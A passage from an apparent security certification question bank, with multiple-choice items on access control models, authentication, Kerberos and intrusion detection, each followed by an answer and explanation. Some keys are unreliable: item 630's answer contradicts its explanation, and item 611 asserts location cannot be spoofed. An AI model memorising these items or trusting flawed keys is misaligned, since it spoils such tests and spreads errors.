C. In a Bell-LaPadula model, the clearance/classification scheme is expressed in terms of a lattice. To determine whether a specific access model is allowed, the clearance of a subject is compared to the classification of the object, and a determination is made as to whether the subject is authorized for the specific access mode. The other three models do not deal with security clearances and sensitivity classifications.
590
Which of the following solutions to local account password management problem could an attacker exploit? a. Use multifactor authentication to access the database. b. Use a hash-based local password and a standard password. c. Use randomly generated passwords. d. Use a central password database.
B. A local password could be based on a cryptographic hash of the media access control address and a standard password. However, if an attacker recovers one local password, the attacker could easily determine other local passwords. An attacker could not exploit the other three choices because they are secure. Other positive solutions include disabling built-in accounts, storing the passwords in the database in an encrypted form, and generating passwords based on a machine name or a media access control address.
591
Which of the following statements is true about intrusion detection systems (IDS) and firewalls? a. Firewalls are a substitution for an IDS. b. Firewalls are an alternative to an IDS. c. Firewalls are a complement to an IDS. d. Firewalls are a replacement for an IDS.
C. An IDS should be used as a complement to a firewall, not a substitute for it. Together, they provide a synergistic effect.
592
The Bell-LaPadula Model for a computer security policy deals with which of the following? a. $ -property b. @ -property c. Star (*) -property d. # -property
C. The star property (*-property) is a Bell-LaPadula security rule enabling a subject write access to an object only if the security level of the object dominates the security level of the subject.
593
Which of the following cannot prevent shoulder surfing? a. Promoting education and awareness b. Preventing password guessing c. Installing encryption techniques d. Asking people not to watch while a password is typed
C. The key thing in shoulder surfing is to make sure that no one watches the user while his password is typed. Encryption does not help here because it is applied after a password is entered, not before. Proper education and awareness and using difficult-to-guess passwords can eliminate this problem.
594
What does the Bell-LaPadula star property (*-property) mean? a. No write-up is allowed. b. No write-down is allowed. c. No read-up is allowed. d. No read-down is allowed.
B. The star property means no write-down and yes to a write-up. A subject can write objects only at a security level that dominates the subject’s level. This means, a subject of one higher label cannot write to any object of a lower security label. This is also known as the confinement property. A subject is prevented from copying data from one higher classification to a lower classification. In other words, a subject cannot write anything below that subject’s level.
595
Which of the following security models covers integrity? a. Bell-LaPadula model b. Biba model c. Information flow model d. Take-Grant model
B. The Biba model is an example of an integrity model. The Bell-LaPadula model is a formal state transition model of a computer security policy that describes a set of access control rules. Both the Bell-LaPadula and the Take-Grant models are a part of access control models.
596
Which of the following security models covers confidentiality? a. Bell-LaPadula model b. Biba model c. Information flow model d. Take-grant model
A. The Bell-LaPadula model addresses confidentiality by describing the security classification levels for documents. These classification levels, from least sensitive to most sensitive, are Unclassified, Confidential, Secret, and Top Secret.
597
Which one of the following is not an authentication mechanism? a. What the user knows b. What the user has c. What the user can do d. What the user is
C. “What the user can do” is defined in access rules or user profiles, which come after a successful authentication. The other three choices are part of an authentication process. The authenticator factor “knows” means a password or PIN, “has” means key or card, and “is” means a biometric identity.
598
Which of the following models is used to protect the confidentiality of classified information? a. Biba model and Bell-LaPadula model b. Bell-LaPadula model and information flow model c. Bell-LaPadula model and Clark-Wilson model d. Clark-Wilson model and information flow model
B. The Bell-LaPadula model is used for protecting the confidentiality of classified information, based on multilevel security classifications. The information flow model, a basis for the Bell-LaPadula model, ensures that information at a given security level flows only to an equal or higher level. Each object has an associated security level. An object’s level indicates the security level of the data it contains. These two models ensure the confidentiality of classified information. The Biba model is similar to the Bell-LaPadula model but protects the integrity of information instead of its confidentiality. The Clark-Wilson model is a less formal model aimed at ensuring the integrity of information, not confidentiality. This model implements traditional accounting controls including segregation of duties, auditing, and well-formed transactions such as double-entry bookkeeping. Both the Biba and Clark-Wilson models are examples of integrity models.
599
Which of the following is the most important part of intrusion detection and containment? a. Prevent b. Detect c. Respond d. Report
C. It is essential to detect insecure situations to respond in a timely manner. Also, it is of little use to detect a security breach if no effective response can be initiated. No set of prevention measures is perfect. Reporting is the last step in the intrusion detection and containment process.
600
Which of the following is the heart of intrusion detection systems? a. Mutation engine b. Processing engine c. State machine d. Virtual machine
B. The processing engine is the heart of the intrusion detection system (IDS). It consists of the instructions (language) for sorting information for relevance, identifying key intrusion evidence, mining databases for attack signatures, and decision making about thresholds for alerts and initiation of response activities. For example, a mutation engine is used to obfuscate a virus, polymorphic or not, to aid the proliferation of the said virus. A state machine is the basis for all computer systems because it is a model of computations involving inputs, outputs, states, and state transition functions. A virtual machine is software that enables a single host computer to run using one or more guest operating systems.
601
From an access control decision viewpoint, failures due to flaws in exclusion-based systems tend to do which of the following? a. Authorize permissible actions b. Fail-safe with permission denied c. Unauthorize prohibited actions d. Grant unauthorized permissions
D. When failures occur due to flaws in exclusion-based systems, they tend to grant unauthorized permissions. The two types of access control decisions are permission-based and exclusion-based.
602
Which of the following is a major issue with implementation of intrusion detection systems? a. False-negative notification b. False-positive notification c. True-negative notification d. True-positive notification
B. One of the biggest single issues with intrusion detection system (IDS) implementation is the handling of false-positive notification. An anomaly-based IDS produces a large number of false alarms (false positives) due to the unpredictable nature of users and networks. Automated systems are prone to mistakes, and human differentiation of possible attacks is resource-intensive.
603
Which of the following provides strong authentication for centralized authentication servers when used with firewalls? a. User IDs b. Passwords c. Tokens d. Account numbers
C. For basic authentication, user IDs, passwords, and account numbers are used for internal authentication. Centralized authentication servers such as RADIUS and TACACS/TACACS+ can be integrated with token-based authentication to enhance firewall administration security.
604
How is authorization different from authentication? a. Authorization comes after authentication. b. Authorization and authentication are the same. c. Authorization is verifying the identity of a user. d. Authorization comes before authentication.
A. Authorization comes after authentication because a user is granted access to a program (authorization) after he is fully authenticated. Authorization is permission to do something with information in a computer. Authorization and authentication are not the same, where the former is verifying the user’s permission and the latter is verifying the identity of a user.
605
Which of the following is required to thwart attacks against a Kerberos security server? a. Initial authentication b. Pre-authentication c. Post-authentication d. Re-authentication
B. The simplest form of initial authentication uses a user ID and password, which occurs on the client. The server has no knowledge of whether the authentication was successful. The problem with this approach is that anyone can make a request to the server asserting any identity, allowing an attacker to collect replies from the server and successfully launch a real attack on those replies. In pre-authentication, the user sends some proof of his identity to the server as part of the initial authentication process. The client must authenticate prior to the server issuing a credential (ticket) to the client. The proof of identity used in pre-authentication can be a smart card or token, which can be integrated into the Kerberos initial authentication process. Here, post-authentication and re-authentication processes do not apply because they occur too late to be of any use.
606
Which of the following statements is not true about discretionary access control? a. Access is based on the authorization granted to the user. b. It uses access control lists. c. It uses grant or revoke access to objects. d. Users and owners are different.
D. Discretionary access control (DAC) permits the granting and revoking of access control privileges to be left to the discretion of individual users. A discretionary access control mechanism enables users to grant or revoke access to any of the objects under their control. As such, users are said to be the owners of the objects under their control. It uses access control lists.
607
Which of the following does not provide robust authentication? a. Kerberos b. Secure remote procedure calls c. Reusable passwords d. Digital certificates
C. Robust authentication means strong authentication that should be required for accessing internal computer systems. Robust authentication is provided by Kerberos, one-time passwords, challenge-response exchanges, digital certificates, and secure remote procedure calls (Secure RPC). Reusable passwords provide weak authentication.
608
Which of the following statements is not true about Kerberos protocol? a. Kerberos uses an asymmetric key cryptography. b. Kerberos uses a trusted third party. c. Kerberos is a credential based authentication system. d. Kerberos uses a symmetric key cryptography.
A. Kerberos uses symmetric key cryptography and a trusted third party. Kerberos users authenticate with one another using Kerberos credentials issued by a trusted third party. The bit size of Kerberos is the same as that of DES, which is 56 bits because Kerberos uses a symmetric key algorithm similar to DES.
609
Which of the following authentication types is most effective? a. Static authentication b. Robust authentication c. Intermittent authentication d. Continuous authentication
D. Continuous authentication protects against impostors (active attacks) by applying a digital signature algorithm to every bit of data sent from the claimant to the verifier. Also, continuous authentication prevents session hijacking and provides integrity. Static authentication uses reusable passwords, which can be compromised by replay attacks. Robust authentication includes one-time passwords and digital signatures, which can be compromised by session hijacking. Intermittent authentication is not useful because of gaps in user verification.
610
For major functions of intrusion detection and prevention system technologies, which of the following statements are true? 1. It is not possible to eliminate all false positives and false negatives. 2. Reducing false positives increases false negatives and vice versa. 3. Decreasing false negatives is always preferred. 4. More analysis is needed to differentiate false positives from false negatives. a. 1 only b. 2 only c. 3 only d. 1, 2, 3, and 4
D. Intrusion detection and prevention system (IDPS) technologies cannot provide completely accurate detection at all times. All four items are true statements. When an IDPS incorrectly identifies benign activity as being malicious, a false positive has occurred. When an IDPS fails to identify malicious activity, a false negative has occurred.
611
Which of the following authentication techniques is impossible to forge? a. What the user knows b. What the user has c. What the user is d. Where the user is
D. Passwords and PINs are often vulnerable to guessing, interception, or brute force attack. Devices such as access tokens and crypto-cards can be stolen. Biometrics can be vulnerable to interception and replay attacks. A location cannot be different than what it is. The techniques used in the other three choices are not foolproof. However, “where the user is” based on a geodetic location is foolproof because it cannot be spoofed or hijacked. Geodetic location, as calculated from a location signature, adds a fourth and new dimension to user authentication and access control mechanisms. The signature is derived from the user’s location. It can be used to determine whether a user is attempting to log in from an approved location. If unauthorized activity is detected from an authorized location, it can facilitate finding the user responsible for that activity.
612
How does a rule-based access control mechanism work? a. It is based on filtering rules. b. It is based on identity rules. c. It is based on access rules. d. It is based on business rules.
C. A rule-based access control mechanism is based on specific rules relating to the nature of the subject and object. These specific rules are embedded in access rules. Filtering rules are specified in firewalls. Both identity and business rules are inapplicable here.
613
Which of the following is an example of a system integrity tool used in the technical security control category? a. Auditing b. Restore to secure state c. Proof-of-wholeness d. Intrusion detection tool
C. The proof-of-wholeness control is a system integrity tool that analyzes system integrity and irregularities and identifies exposures and potential threats. The proof-of-wholeness principle detects violations of security policies. Auditing is a detective control, which enables monitoring and tracking of system abnormalities. “Restore to secure state” is a recovery control that enables a system to return to a state that is known to be secure, after a security breach occurs. Intrusion detection tools detect security breaches.
614
Individual accountability does not include which of the following? a. Unique identifiers b. Access rules c. Audit trails d. Policies and procedures
D. A basic tenet of IT security is that individuals must be accountable for their actions. If this is not followed and enforced, it is not possible to successfully prosecute those who intentionally damage or disrupt systems or to train those whose actions have unintended adverse effects. The concept of individual accountability drives the need for many security safeguards, such as unique (user) identifiers, audit trails, and access authorization rules. Policies and procedures indicate what to accomplish and how to accomplish objectives. By themselves, they do not exact individual accountability.
615
From an access control viewpoint, which of the following is computed from a passphrase? a. Access password b. Personal password c. Valid password d. Virtual password
D. A virtual password is a password computed from a passphrase that meets the requirements of password storage (e.g., 56 bits for DES). A passphrase is a sequence of characters, longer than the acceptable length of a regular password, which is transformed by a password system into a virtual password of acceptable length. An access password is a password used to authorize access to data and is distributed to all those who are authorized to have similar access to that data. A personal password is a password known by only one person and is used to authenticate that person’s identity. A valid password is a personal password that authenticates the identity of an individual when presented to a password system. It is also an access password that enables the requested access when presented to a password system.
616
Which of the following is an incompatible function for a database administrator? a. Data administration b. Information systems administration c. Systems security d. Information systems planning
C. The database administrator (DBA) function is concerned with short-term development and use of databases, and is responsible for the data of one or several specific databases. The DBA function should be separate from the systems security function due to a possible conflict of interest in the manipulation of access privileges and rules for personal gain. The DBA function can be mixed with data administration, information systems administration, or information systems planning because there is no harm to the organization.
617
Kerberos uses which of the following to protect against replay attacks? a. Cards b. Timestamps c. Tokens d. Keys
B. A replay attack refers to the recording and retransmission of message packets in the network. Although a replay attack frequently goes undetected, it can be prevented by using packet timestamping. Kerberos uses timestamps, not cards, tokens, or keys, for this purpose.
618
Which of the following user identification and authentication techniques depend on reference profiles or templates? a. Memory tokens b. Smart cards c. Cryptography d. Biometric systems
D. Biometric systems require the creation and storage of profiles or templates of individuals wanting system access. These include physiological attributes such as fingerprints, hand geometry, or retina patterns, or behavioral attributes such as voice patterns and handwritten signatures. Memory tokens and smart cards involve the creation and distribution of a token device with a PIN, and data that tell the computer how to recognize valid tokens or PINs. Cryptography requires the generation, distribution, storage, entry, use, and archiving of cryptographic keys.
619
When security products cannot provide sufficient protection through encryption, system administrators should consider using which of the following to protect intrusion detection and prevention system management communications? 1. Physically separated network 2. Logically separated network 3. Virtual private network 4. Encrypted tunneling a. 1 and 4 b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
C. System administrators should ensure that all intrusion detection and prevention system (IDPS) management communications are protected either through physical separation (management network) or logical separation (virtual network) or through encryption using transport layer security (TLS). However, for security products that do not provide sufficient protection through encryption, administrators should consider using a virtual private network (VPN) or other encrypted tunneling method to protect the network traffic.
620
Which situation is Kerberos not used in? a. Managing distributed access rights b. Managing encryption keys c. Managing centralized access rights d. Managing access permissions
A. Kerberos is a private key authentication system that uses a central database to keep a copy of all users’ private keys. The entire system can be compromised due to the central database. Kerberos is used to manage centralized access rights, encryption keys, and access permissions.
621
Which of the following security control mechanisms is simplest to administer? a. Discretionary access control b. Mandatory access control c. Access control list d. Logical access control
B. Mandatory access controls are the simplest to use because they can be used to grant broad access to large sets of files and to broad categories of information. Discretionary access controls are not simple to use due to their finer level of granularity in the access control process. Both the access control list and logical access control require a significant amount of administrative work because they are based on the details of each individual user.
622
What implementation is an example of an access control policy for a bank teller? a. Role-based policy b. Identity-based policy c. User-directed policy d. Rule-based policy
A. With role-based access control, access decisions are based on the roles that individual users have as part of an organization. Users take on assigned roles (such as doctor, nurse, bank teller, and manager). Access rights are grouped by role name, and the use of resources is restricted to individuals authorized to assume the associated role. The use of roles to control access can be an effective means for developing and enforcing enterprise-specific security policies and for streamlining the security management process. Identity-based and user-directed policies are incorrect because they are examples of discretionary access control. Identity-based access control is based only on the identity of the subject and object. In user-directed access controls, a subject can alter the access rights with certain restrictions. Rule-based policy is incorrect because it is an example of a mandatory type of access control and is based on specific rules relating to the nature of the subject and object.
623
Which of the following access mechanisms creates a potential security problem? a. Location-based access mechanism b. IP address-based access mechanism c. Token-based access mechanism d. Web-based access mechanism
B. IP address-based access mechanisms use Internet Protocol (IP) source addresses, which are not secure and subject to IP address spoofing attacks. The IP address deals with identification only, not authentication. Location-based access mechanism is incorrect because it deals with a physical address, not IP address. Token-based access mechanism is incorrect because it uses tokens as a means of identification and authentication. Web-based access mechanism is incorrect because it uses secure protocols to accomplish authentication. The other three choices accomplish both identification and authentication and do not create a security problem as does the IP address-based access mechanism.
624
Rank the following authentication mechanisms from most to least protection against replay attacks. a. Password only, password and PIN, challenge-response, and one-time password b. Password and PIN, challenge-response, one-time password, and password only c. Challenge-response, one-time password, password and PIN, and password only d. Challenge-response, password and PIN, one-time password, and password only
C. A challenge-response protocol is based on cryptography and works by having the computer generate a challenge, such as a random string of numbers. The smart token then generates a response based on the challenge. This is sent back to the computer, which authenticates the user based on the response. Smart tokens that use either challenge-response protocols or dynamic password generation can create one-time passwords that change periodically (e.g., every minute). If the correct value is provided, the log-in is permitted, and the user is granted access to the computer system. Electronic monitoring is not a problem with one-time passwords because each time the user is authenticated to the computer, a different “password” is used. A hacker could learn the one-time password through electronic monitoring, but it would be of no value. Passwords and personal identification numbers (PINs) have weaknesses such as disclosure and guessing. Passwords combined with PINs are better than passwords only. Both passwords and PINs are subject to electronic monitoring. Simple encryption of a password that will be used again does not solve the monitoring problem because encrypting the same password creates the same ciphertext; the ciphertext becomes the password.
625
Some security authorities believe that re-authentication of every transaction provides stronger security procedures. Which of the following security mechanisms is least efficient and least effective for re-authentication? a. Recurring passwords b. Nonrecurring passwords c. Memory tokens d. Smart tokens
A. Recurring passwords are static passwords with reuse and are considered to be a relatively weak security mechanism. Users tend to use easily guessed passwords. Other weaknesses include spoofing users, users stealing passwords through observing keystrokes, and users sharing passwords. The unauthorized use of passwords by outsiders (hackers) or insiders is a primary concern, and passwords are considered the least efficient and least effective security mechanism for re-authentication. Nonrecurring passwords are incorrect because they provide a strong form of re-authentication. Examples include a challenge-response protocol or a dynamic password generator where a unique value is generated for each session. These values are not repeated and are good for that session only. Tokens can help in re-authenticating a user or transaction. Memory tokens store but do not process information. Smart tokens expand the functionality of a memory token by incorporating one or more integrated circuits into the token itself. In other words, smart tokens store and process information. Except for passwords, all the other methods listed in the question are examples of advanced authentication methods that can be applied to re-authentication.
626
Which of the following lists a pair of compatible functions within the IT organization? a. Computer operations and applications programming b. Systems programming and data security administration c. Quality assurance and data security administration d. Production job scheduling and computer operations
C. Separation of duties is the first line of defense for the prevention, detection, and correction of errors, omissions, and irregularities. The objective is to ensure that no one person has complete control over a transaction throughout its initiation, authorization, recording, processing, and reporting. If the total risk is acceptable, then two different jobs can be combined. If the risk is unacceptable, the two jobs should not be combined. Both quality assurance and data security are staff functions and would not handle the day-to-day operations tasks. The other three choices are incorrect because they are examples of incompatible functions. The rationale is to minimize such functions that are not conducive to a good internal control structure. For example, if a computer operator is also responsible for production job scheduling, he could submit unauthorized production jobs.
627
A security label, or access control mechanism, is supported by which of the following access control policies? a. Role-based policy b. Identity-based policy c. User-directed policy d. Mandatory access control policy
D. Mandatory access control is a type of access control that cannot be made more permissive by subjects. It is based on information sensitivity, such as security labels for clearance and data classification. Rule-based and administratively directed policies are examples of mandatory access control policy. Role-based policy is an example of nondiscretionary access controls. Access control decisions are based on the roles individual users are taking in an organization. This includes the specification of duties, responsibilities, obligations, and qualifications (e.g., a teller or loan officer associated with a banking system). Both identity-based and user-directed policies are examples of discretionary access control. It is a type of access control that permits subjects to specify the access controls with certain limitations. Identity-based access control is based only on the identity of the subject and object. User-directed control is a type of access control in which subjects can alter the access rights with certain restrictions.
628
The principle of least privilege refers to the security objective of granting users only those accesses they need to perform their job duties. Which of the following actions is inconsistent with the principle of least privilege? a. Authorization creep b. Re-authorization when employees change positions c. Users have little access to systems d. Users have significant access to systems
A. Authorization creep occurs when employees continue to maintain access rights for previously held positions within an organization. This practice is inconsistent with the principle of least privilege. The other three choices are incorrect because they are consistent with the principle of least privilege. Re-authorization can eliminate authorization creep, and it does not matter how many users have access to the system or how much access they have as long as their access is based on the need-to-know concept. Permanent changes are necessary when employees change positions within an organization. In this case, the process of granting account authorizations occurs again. At this time, however, it is also important that access authorizations of the prior position be removed. Many instances of authorization creep have occurred with employees continuing to maintain access rights for previously held positions within an organization. This practice is inconsistent with the principle of least privilege, and it is a security vulnerability.
629
Accountability is important to implementing security policies. Which of the following is least effective in exacting accountability from system users? a. Auditing requirements b. Password and user ID requirements c. Identification controls d. Authentication controls
B. Accountability means holding individual users responsible for their actions. Due to several problems with passwords and user IDs, they are considered to be the least effective in exacting accountability. These problems include easy-to-guess passwords, users being easily spoofed for passwords, passwords being easy to steal, and passwords being easy to share. The most effective controls for exacting accountability include a policy, an authorization scheme, identification and authentication controls, access controls, audit trails, and auditing.
630
Which of the following statements is not true in electronic authentication? a. The registration authority and the credential service provider may be the same entity b. The verifier and the relying party may be the same entity c. The verifier, credential service provider, and the relying party may be separate entities d. The verifier and the relying party may be separate entities
A. The relationship between the registration authority (RA) and the credential service provider (CSP) is a complex one with an ongoing relationship. In the simplest and perhaps the most common case, the RA and CSP are separate functions of the same entity. However, an RA might be part of a company or organization that registers subscribers with an independent CSP, or several different CSPs. Therefore, a CSP may be an integral part of an RA, or it may have relationships with multiple independent RAs, and an RA may have relationships with different CSPs as well. The statements in the other three choices are true. The party to be authenticated is called a claimant (subscriber) and the party verifying that identity is called a verifier. When a subscriber needs to authenticate to perform a transaction, he becomes a claimant to a verifier. A relying party relies on the results of an online authentication to establish the identity or attribute of a subscriber for the purpose of some transaction. Relying parties use a subscriber’s authenticated identity and other factors to make access control or authorization decisions. The verifier and the relying party may be the same entity, or they may be separate entities. In some cases the verifier does not need to directly communicate with the CSP to complete the authentication activity (e.g., the use of digital certificates), which represents a logical link between the two entities rather than a physical link. In some implementations, the verifier, the CSP functions, and the relying party may be distributed and separated.
631
Location-based authentication techniques for transportation firms can be effectively used to provide which of the following? a. Static authentication b. Intermittent authentication c. Continuous authentication d. Robust authentication
C. Transportation firms can use location-based authentication techniques continuously, as there are no time and resource limits. It does not require any secret information to protect at either the host or user end. Continuous authentication is better than robust authentication, where the latter can be intermittent.
632
System administrators pose a threat to computer security due to their access rights and privileges. Which of the following statements is true for an organization with one administrator? a. Masquerading by a system administrator can be prevented. b. A system administrator’s access to the system can be limited. c. Actions by the system administrator can be detected. d. A system administrator cannot compromise system integrity.
C. Authentication data needs to be stored securely, and its value lies in the data’s confidentiality, integrity, and availability. If confidentiality is compromised, someone may use the information to masquerade as a legitimate user. If system administrators can read the authentication file, they can masquerade as another user. Many systems use encryption to hide the authentication data from the system administrators. Masquerading by system administrators cannot be entirely prevented. If integrity is compromised, authentication data can be added, or the system can be disrupted. If availability is compromised, the system cannot authenticate users, and the users may not be able to work. Because audit controls would be outside the control of the administrator, controls can be set up so that improper actions by the system administrators can be detected in audit records. Due to their broader responsibilities, the system administrators’ access to the system cannot be limited. System administrators can compromise a system’s integrity; again, their actions can be detected in audit records. It makes a big difference whether an organization has one or more than one system administrator, for separation of duties or for the “least privilege” principle to work. With several system administrators, a system administrator account could be set up for one person to have the capability to add accounts. Another administrator could have the authority to delete them. When there is only one system administrator employed, breaking up the duties is not possible.
633
Logical access controls provide a technical means of controlling access to computer systems. Which of the following is not a benefit of logical access controls? a. Integrity b. Availability c. Reliability d. Confidentiality
C. Computer-based access controls are called logical access controls. These controls can prescribe not only who or what is to have access to a specific system resource but also the type of access permitted, usually in software. Reliability is more of a hardware issue. Logical access controls can help protect (i) operating systems and other systems software from unauthorized modification or manipulation (and thereby help ensure the system’s integrity and availability); (ii) the integrity and availability of information by restricting the number of users and processes with access; and (iii) confidential information from being disclosed to unauthorized individuals.
634
Which of the following internal access control methods offers a strong form of access control and is a significant deterrent to its a. Security labels b. Passwords c. Access control lists d. Encryption
A. Security labels are a strong form of access control. Unlike access control lists, labels cannot ordinarily be changed. Because labels are permanently linked to specific information, data cannot be disclosed by a user copying information and changing the access to that file so that the information is more accessible than the original owner intended. Security labels are well suited for consistently and uniformly enforcing access restrictions, although their administration and inflexibility can be a significant deterrent to their use. Passwords are a weak form of access control, although they are easy to use and administer. Although encryption is a strong form of access control, it is not a deterrent to its use when compared to labels. In reality, the complexity and difficulty of encryption can be a deterrent to its use.
635
It is vital that access controls protecting a computer system work together. Which of the following types of access controls should be most specific? a. Physical b. Application system c. Operating system d. Communication system
B. At a minimum, four basic types of access controls should be considered: physical, operating system, communications, and application. In general, access controls within an application are the most specific. However, for application access controls to be fully effective, they need to be supported by operating system and communications system access controls. Otherwise, access can be made to application resources without going through the application. Operating system, communication, and application access controls need to be supported by physical access controls such as physical security and contingency planning.
636
Which of the following types of logical access control mechanisms does not rely on physical access controls? a. Encryption controls b. Application system access controls c. Operating system access controls d. Utility programs
A. Most systems can be compromised if someone can physically access the CPU machine or major components by, for example, restarting the system with different software. Logical access controls are, therefore, dependent on physical access controls (with the exception of encryption, which can depend solely on the strength of the algorithm and the secrecy of the key). Application systems, operating systems, and utility programs are heavily dependent on logical access controls to protect against unauthorized use.
637
A system mechanism and audit trails help business managers hold individual users accountable for their actions. To utilize these audit trails, which of the following controls is a prerequisite for the mechanism to be effective? a. Physical b. Environmental c. Management d. Logical access
D. By advising users that they are personally accountable for their actions, which are tracked by an audit trail that logs user activities, managers can help promote proper user behavior. Users are less likely to attempt to circumvent security policy if they know that their actions will be recorded in an audit log. Audit trails work in concert with logical access controls, which restrict use of system resources. Because logical access controls are enforced through software, audit trails are used to maintain an individual’s accountability. The other three choices collect some data in the form of an audit trail, and their use is limited due to the limitation of useful data collected.
638
Which of the following is the best place to put the Kerberos Protocol? a. Application layer b. Transport layer c. Network layer d. All layers of the network
D. Placing the Kerberos protocol below the application layer and at all layers of the network provides greatest security protection without the need to modify applications.
639
An inherent risk is associated with logical access that is difficult to prevent or mitigate but can be identified via a review of audit trails. Which of the following types of access is this risk most associated with? a. Properly used authorized access b. Misused authorized access c. Unsuccessful unauthorized access d. Successful unauthorized access
B. Audit trail analysis applies to properly used authorized access as well as to misused authorized access, but more so to the latter because of its higher risk. Although users cannot be prevented from using resources to which they have legitimate access authorization, audit trail analysis is used to examine their actions. Similarly, unauthorized access attempts, whether successful or not, can be detected through the analysis of audit trails.
640
Many computer systems provide maintenance accounts for diagnostic and support services. Which of the following security techniques is least preferred to ensure reduced vulnerability when using these accounts? a. Call-back confirmation b. Encryption of communications c. Smart tokens d. Password and user ID
D. Many computer systems provide maintenance accounts. These special login accounts are normally preconfigured at the factory with preset, widely known weak passwords. It is critical to change these passwords or otherwise disable the accounts until they are needed. If the account is to be used remotely, authentication of the maintenance provider can be performed using callback confirmation. This helps ensure that remote diagnostic activities actually originate from an established phone number at the vendor’s site. Other techniques can also help, including encryption and decryption of diagnostic communications, strong identification and authentication techniques, such as smart tokens, and remote disconnect verification.
641
Below is a list of pairs, which are related to one another. Which pair of items represents the integral reliance on the first item to enforce the second? a. The separation of duties principle, the least privilege principle b. The parity check, the limit check c. The single-key system, the Rivest-Shamir-Adleman (RSA) algorithm d. The two-key system, the Data Encryption Standard (DES) algorithm
A. The separation of duties principle is related to the “least privilege” principle; that is, users and processes in a system should have the least number of privileges and for the minimal period of time necessary to perform their assigned tasks. The authority and capacity to perform certain functions should be separated and delegated to different individuals. This principle is often applied to split the authority to write and approve monetary transactions between two people. It can also be applied to separate the authority to add users to a system and other system administrator duties from the authority to assign passwords, conduct audits, and perform other security administrator duties. There is no relation between the parity check, which is hardware based, and the limit check, which is a software-based application. The parity check is a check that tests whether the number of ones (1s) or zeros (0s) in an array of binary digits is odd or even. Odd parity is standard for synchronous transmission and even parity for asynchronous transmission. In the limit check, a program tests the specified data fields against defined high or low value limits for acceptability before further processing. The RSA algorithm is incorrect because it uses two keys: private and public. The DES is incorrect because it uses only one key for both encryption and decryption (secret or private key).
642
Which of the following is the most effective method for password creation? a. Using password generators b. Using password advisors c. Assigning passwords to users d. Implementing user selected passwords
B. Password advisors are computer programs that examine user choices for passwords and inform the users if the passwords are weak. Passwords produced by password generators are difficult to remember, whereas user-selected passwords are easy to guess. Users write the password down on paper when it is assigned to them.
643
Which one of the following items is a more reliable authentication device than the others? a. Fixed callback system b. Variable callback system c. Fixed and variable callback system d. Smart card system
D. Authentication is providing assurance about the identity of a subject or object; for example, ensuring that a particular user is who he claims to be. A smart card system uses cryptographic-based smart tokens that offer great flexibility and can solve many authentication problems such as forgery and masquerading. A smart token typically requires a user to provide something the user knows (i.e., a PIN or password), which provides a stronger control than the smart token alone. Smart cards do not require a callback because the codes used in the smart card change frequently and cannot be repeated. Callback systems are used to authenticate a person. A fixed callback system calls back to a known telephone associated with a known place. However, the called person may not be known, and masquerading is a problem. It is not only insecure but also inflexible because it is tied to a specific place. It is not applicable if the caller moves around. A variable callback system is more flexible than the fixed one but requires greater maintenance of the variable telephone numbers and locations. These phone numbers can be recorded or decoded by a hacker.
644
Which of the following is an example of a drawback of smart cards? a. A means of access control b. A means of storing user data c. A means of gaining unauthorized access d. A means of access control and data storage
C. Because valuable data is stored on a smart card, the card is useless if lost, damaged, or forgotten. An unauthorized person can gain access to a computer system in the absence of other strong controls. A smart card is a credit card-sized device containing one or more integrated circuit chips, which perform the functions of a microprocessor, memory, and an input/output interface. Smart cards can be used (i) as a means of access control, (ii) as a medium for storing and carrying the appropriate data, and (iii) as a combination of (i) and (ii).
645
Which of the following is a simpler and more basic login control? a. Validating username and password b. Monitoring unsuccessful logins c. Sending alerts to the system operators d. Disabling accounts when a break-in occurs
A. Login controls specify the conditions users must meet for gaining access to a computer system. In the simplest and most basic case, access will be permitted only when both a username and password are provided. More complex systems grant or deny access based on the type of computer login; that is, local, dialup, remote, network, batch, or subprocess. The security system can restrict access based on the type of terminal or remote computer, so that access will be granted only when the user or program is located at a designated terminal or remote system. Also, access can be defined by the time of day and the day of the week. As a further precaution, the more complex and sophisticated systems monitor unsuccessful logins, send messages or alerts to the system operator, and disable accounts when a break-in occurs.
646
There are trade-offs among controls. A security policy would be most useful in which of the following areas? 1. System-generated passwords versus user-generated passwords 2. Access versus confidentiality 3. Technical controls versus procedural controls 4. Manual controls versus automated controls a. 1 and 2 b. 3 and 4 c. 2 and 3 d. 2 and 4
C. A security policy is the framework within which an organization establishes needed levels of information security to achieve the desired confidentiality goals. A policy is a statement of information values, protection responsibilities, and organizational commitment for a computer system. It is a set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information. There are trade-offs among controls such as technical controls and procedural controls. If technical controls are not available, procedural controls might be used until a technical solution is found. Nevertheless, technical controls are useless without procedural controls and a robust security policy. Similarly, there is a trade-off between access and confidentiality; that is, a system meeting standards for access allows authorized users access to information resources on an ongoing basis. The emphasis given to confidentiality, integrity, and access depends on the nature of the application. An individual system may sacrifice the level of one requirement to obtain a greater degree of another. For example, to allow for increased levels of availability of information, standards for confidentiality may be lowered. Thus, the specific requirements and controls for information security can vary. Passwords and controls also involve trade-offs, but at a lower level. Passwords require deciding between system-generated passwords, which can offer more security than user-generated passwords because system-generated passwords are randomly generated pseudo words not found in the dictionary. However, system-generated passwords are harder to remember, forcing users to write them down, thus defeating the purpose. Controls require selecting between a manual and automated control or selecting a combination of manual and automated controls. One control can work as a compensating control for the other.
647
Ensuring data and program integrity is important. Which of the following controls best applies the separation of duties principle in an automated computer operations environment? a. File placement controls b. Data file naming conventions c. Program library controls d. Program and job naming conventions
C. Program library controls enable only assigned programs to run in production and eliminate the problem of test programs accidentally entering the production environment. They also separate production and testing data to ensure that no test data are used in normal production. This practice is based on the “separation of duties” principle. File placement controls ensure that files reside on the proper direct access storage device so that data sets do not go to a wrong device by accident. Data file, program, and job naming conventions implement the separation of duties principle by uniquely identifying each production and test data file names, program names, job names, and terminal usage.
648
How does a role-based access control mechanism work? a. Based on job enlargement concept b. Based on job duties concept c. Based on job enrichment concept d. Based on job rotation concept
B. Users take on assigned roles such as doctor, nurse, teller, and manager. With role-based access control mechanism, access decisions are based on the roles that individual users have as part of an organization, that is, job duties. Job enlargement means adding width to a job; job enrichment means adding depth to a job; and job rotation makes a person well rounded.
649
Which of the following are countermeasures against a rainbow table attack arising from a password cracking threat? a. One-time password and one-way hash b. Keyspace and passphrase c. Salting and stretching d. Entropy and user account lockout
